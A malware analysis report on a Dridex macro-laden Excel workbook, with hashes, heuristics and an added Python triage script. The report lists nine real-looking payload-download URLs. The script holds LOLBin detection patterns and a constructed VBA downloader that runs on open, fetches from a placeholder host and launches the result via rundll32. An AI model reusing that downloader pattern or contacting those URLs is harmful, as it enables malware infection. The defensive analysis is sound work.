Dridex — Office (OOXML) / .XLSM malware analysis

Static analysis result for SHA-256 dfe4a58c8eaa737b…

MALICIOUS

Office (OOXML) / .XLSM

Size: 625.0 KB
Created: 2021-05-10 16:23:15 UTC
Authoring application: Microsoft Excel 15.0300
MD5: 41a7b85ab2340d9cffcea9d4fed5886d
SHA-1: af7a46c0034977be519a3ebdd656675dd02c8c94
SHA-256: dfe4a58c8eaa737bbd257cc8201220d5d59e73ffc4c21329e0e88cc1d04b80fe
Risk score: 248

Malware Insights

Dridex · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1059.003 Command and Scripting Interpreter: Windows Command Shell
  • T1218.011 System Binary Proxy Execution: Rundll32
  • T1105 Ingress Tool Transfer

The sample is an XLSM workbook whose VBA project contains a Workbook_Open macro, so the code runs as soon as the document is opened with macros enabled. The macro uses CreateObject to instantiate MSXML2.XMLHTTP and WScript.Shell: the XMLHTTP object fetches a second-stage payload from one of the nine embedded URLs (all .php endpoints on unrelated third-party domains; T1105), Environ() is used to access environment variables, and the payload is then launched through WScript.Shell, with rundll32 among the visible execution tools (T1218.011). The ClamAV signature Xls.Downloader.DridexOffice0521-9863759-0 fires on the container file rather than on the carved macro source or vbaProject.bin (both are reported clean below), and together with this downloader pattern it strongly suggests Dridex family attribution.

Heuristics (8)

  • ClamAV: Xls.Downloader.DridexOffice0521-9863759-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Downloader.DridexOffice0521-9863759-0
  • Workbook_Open macro [high] OLE_VBA_WBOPEN
    Auto-executing entry point: the macro runs when the workbook is opened with macros enabled, with no further user interaction.
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    Late-bound COM instantiation (here WScript.Shell and MSXML2.XMLHTTP, per the summary), the usual way a VBA downloader gets an HTTP client and a process launcher.
  • Visible LOLBin command execution instruction [high] SE_LOLBIN_RUN_COMMAND
    Document contains instructions or visible command text involving Windows script/execution tools such as PowerShell, mshta, cmd, rundll32, or regsvr32.
  • Suspicious extracted artifact [high] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • VBA project inside OOXML [medium] OOXML_VBA
    Document contains xl/vbaProject.bin, so VBA macros are present.
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Reads environment variables, commonly used to build a drop path under a user-writable directory.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • https://s3solutions.ae/d6dCRQeJGD00Os.php
    • https://aula-virtual.istpiberoamericano.edu.pe/grade/import/direct/lang/en/g1yIdqk0u.php
    • https://toptaxi24.com/toptest/toptaxi/homedir/mail/cur/JqV4fB12DW8cw.php
    • https://marianayalfonso.com/wp-content/plugins/mpc-massive/panel/extra/cdJv1ZjMU3JsM.php
    • https://suubis.com/wp-content/plugins/elementskit-lite/modules/controls/eNIIx0qt3Zbnfp.php
    • https://tseboprocurement.co.za/inc/phpmailer/test_script/images/_notes/E3KYpyHWeU.php
    • https://sellobsoleteinventories.com/images/favicon/0mJUsyWM8dOk6.php
    • https://consultoriaemimpermeabilizacao.com/wp-includes/js/tinymce/plugins/charmap/SUn668N8oHZI.php
    • https://kronocreativeagency.com/wp-content/themes/twentynineteen/template-parts/content/O9chyPRvQDmYt.php
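The summary and the heuristics above describe a check that is easy to reproduce by hand. The following is an added example, not the analysis platform's own code and not the sample's real macro: it builds a constructed minimal OOXML container in memory to show the OOXML_VBA presence check, then runs approximations of the OLE_VBA_WBOPEN, OLE_VBA_CREATEOBJ, OLE_VBA_ENVIRON, SE_LOLBIN_RUN_COMMAND and EMBEDDED_URL heuristics over a constructed VBA listing that mirrors the reported behaviour (Workbook_Open, WScript.Shell, MSXML2.XMLHTTP, Environ, rundll32). The regexes, the placeholder URL and the severity labels are assumptions for illustration.

```python
"""Added triage example (not the platform's code). The VBA text is constructed."""
import io
import re
import zipfile

# Assumed patterns approximating the report's heuristics (not the platform's rules).
AUTOEXEC_RE = re.compile(
    r"\b(Workbook_Open|Auto_Open|Document_Open|AutoOpen|Workbook_Activate)\b", re.I)
CREATEOBJ_RE = re.compile(r'CreateObject\s*\(\s*"([^"]+)"', re.I)
ENVIRON_RE = re.compile(r'Environ\s*\(\s*"?([A-Za-z_]+)', re.I)
LOLBIN_RE = re.compile(
    r"\b(rundll32|regsvr32|mshta|powershell|cmd|certutil)(?:\.exe)?\b", re.I)
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)

# Constructed VBA mirroring the reported behaviour; inert text, never executed here.
SAMPLE_VBA = r'''
Private Sub Workbook_Open()
    Dim sh, req, tmp
    Set sh = CreateObject("WScript.Shell")
    Set req = CreateObject("MSXML2.XMLHTTP")
    tmp = Environ("TEMP") & "\stage.dll"
    req.Open "GET", "https://example.invalid/stage.php", False
    req.Send
    ' response body would be written to tmp here
    sh.Run "rundll32.exe " & tmp & ",DllRegisterServer", 0
End Sub
'''


def build_constructed_xlsm(with_vba: bool) -> bytes:
    """Minimal constructed OOXML ZIP (not a real workbook) for the presence check."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("xl/workbook.xml", "<workbook/>")
        if with_vba:
            # A real vbaProject.bin is an OLE2 compound file whose module streams are
            # MS-OVBA compressed; a placeholder is enough to exercise the check.
            z.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1placeholder")
    return buf.getvalue()


def has_vba_project(xlsm_bytes: bytes) -> bool:
    """OOXML_VBA: an .xlsm is a ZIP; macros are present iff xl/vbaProject.bin exists."""
    with zipfile.ZipFile(io.BytesIO(xlsm_bytes)) as z:
        return any(n.lower() == "xl/vbaproject.bin" for n in z.namelist())


def _unique(items):
    """Preserve first-seen order, case-insensitive de-duplication."""
    seen, out = set(), []
    for it in items:
        if it.lower() not in seen:
            seen.add(it.lower())
            out.append(it)
    return out


def triage_vba(source: str) -> dict:
    """Run the string heuristics over decoded VBA source and return findings."""
    autoexec = _unique(AUTOEXEC_RE.findall(source))
    createobj = _unique(CREATEOBJ_RE.findall(source))
    environ = _unique(ENVIRON_RE.findall(source))
    lolbins = _unique(m.lower() for m in LOLBIN_RE.findall(source))
    urls = _unique(URL_RE.findall(source))

    hits = {}  # heuristic id -> severity, mirroring the report's labels
    if any(a.lower() == "workbook_open" for a in autoexec):
        hits["OLE_VBA_WBOPEN"] = "high"
    if createobj:
        hits["OLE_VBA_CREATEOBJ"] = "high"
    if lolbins:
        hits["SE_LOLBIN_RUN_COMMAND"] = "high"
    if environ:
        hits["OLE_VBA_ENVIRON"] = "low"
    if urls:
        hits["EMBEDDED_URL"] = "info"

    # Downloader shape from the summary: auto-exec + HTTP client object + a way to run the result.
    http_client = any("xmlhttp" in c.lower() or "winhttp" in c.lower() for c in createobj)
    runner = any("shell" in c.lower() for c in createobj) or bool(lolbins)
    downloader = bool(autoexec) and http_client and runner

    return {"autoexec": autoexec, "createobject": createobj, "environ": environ,
            "lolbins": lolbins, "urls": urls, "hits": hits,
            "downloader_pattern": downloader}


if __name__ == "__main__":
    print("vbaProject.bin present:", has_vba_project(build_constructed_xlsm(True)))
    for key, value in triage_vba(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

Note that the string heuristics only work on decoded source: inside vbaProject.bin the module text is MS-OVBA compressed, so grepping the raw .bin for URLs or CreateObject misses most of it. That is why the report carves macros.bas with oletools' olevba first and scores that artifact separately.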

Extracted artifacts (2)

Files carved from inside the sample during analysis.

  • macros.bas
    Kind: vba-macro
    Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
    Size: 430333 bytes
    SHA-256: 3afc589db3d5827e763d187442d374ae6ef84e3deeac53a72dbbb5ee99a8fdf2
    Detection: ClamAV: No threats found
    Obfuscation or payload: likely (carved macro source contains an auto-exec entry point and execution/download terms)
  • vbaProject_00.bin
    Kind: vba-project
    Source: OOXML VBA project: xl/vbaProject.bin
    Size: 892928 bytes
    SHA-256: bdbe12ea4bd13a379c08e0c01b9b575788b2418219a6cd3b96ddda3d4c9f65e8
    Detection: ClamAV: No threats found
    Obfuscation or payload: likely (carved macro source contains an auto-exec entry point and execution/download terms)